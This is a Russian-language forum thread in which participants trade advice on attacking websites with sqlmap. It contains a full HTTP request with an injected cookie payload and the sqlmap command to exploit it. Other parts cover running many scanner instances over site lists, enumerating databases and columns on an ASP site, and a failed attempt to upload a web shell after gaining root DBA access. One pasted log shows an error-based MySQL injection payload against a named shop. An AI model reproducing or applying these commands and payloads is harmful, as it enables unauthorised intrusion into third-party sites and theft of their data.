Конечно. Главное что бы инет позволял, однако я призываю вас, всем, проводить самостоятельно эксперименты, и делится результатом с публикой.
Есть уязвимость в с сокет,точнее blind sqlini в сокет параметре Как сделать запрос к sqlmap что бы он начал крутить?) GET /url HTTP/1.1 Cookie: checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=1000000000000111444833031088028731474956441558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0= X-Requested-With: XMLHttpRequest Referer: https://site.com:443/ Host: https://site.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */*
--cookie="checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=1000000000000111444833031088028731474956441558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=" -v 3 --level 3 --risk 3 -p guest_id
ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?
wtf а треды тебе на что? Code: ~$ python sqlmap.py --help | grep threads --threads=THREADS Max number of concurrent HTTP(s) requests (default 1) если ты действительно имел ввиду то что спрашивал, то нет, количество копий для разных сайтов не ускорит работу о_О "ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?" узнай лимит канала своего провайдера, хотя даже 1-2мб ты запаришся забивать sqlmap'ом, скорее тебе пров атата скажет
не типа, смотри, запускаем одно временно сканить 2 сканеров и 20 разных сайтов, типа это будет по скорости быстрее, чем сканить с начало 1 сайт, потом второй итд...
сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды
ну я имел ввиду чтобы сканеры запускать для разных сайтов) например создать отдельный список сайтов для каждого сканера
Ничего не могу понять. [21:06:50] [INFO] testing if current user is DBA [21:06:50] [INFO] fetching current user [21:06:50] [INFO] resumed: root@localhost current user is DBA: True Пытаюсь залить шелл пишет
Да. Откуда вы путь взяли? похоже что он не верный, вроде 13 ошибка говорит о том что папка недоступна для записи. Вообщем по логам понять ничего не могу. С начало у вас /home/ste/public_htm l/admin-ste/ Потом /windows-tools/active- directory-manager/
--crawl=2 <- сканирование структуры сайта,Какое макс значение и есть описание допустим --crawl=1 - гет запросы --crawl=2 гет и пост и тд
Доброго всем времени суток! Парни, помогите решить одну проблемку... В общем суть дела: Есть сайт на ASP Нашел мапом две скули. Когда прошу чекнуть базу... Выползает огромный список баз в количестве около 120 штук. Хз что такое творится. Задавал пар. --current-db (user), показывало название базы и юзверя. Но вот колонки читать не хочет. Чекаю так: 1. sqlmap.py -u site.com/site.aspx?s=104 --dbs --threads=10 2. sqlmap.py -u site.com/site.aspx?s=104 -D Base --columns --no-cast --threads=10
sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* (URI) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: http://vapenw.com:80/catalogsearch/result/?cat=-3835) OR 1 GROUP BY CONCAT(0x716a7a7071,(SELECT (CASE WHEN (3882=3882) THEN 1 ELSE 0 END)),0x716a70 7871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&product_finished=52&q=1&rating=2 --- [22:53:16] [INFO] testing MySQL [22:53:16] [WARNING] reflective value(s) found and filtering out [22:53:46] [WARNING] turning off pre-connect mechanism because of connection tim e out(s) [22:53:46] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [22:55:16] [CRITICAL] connection timed out to the target URL пробывал с проски результата нуль(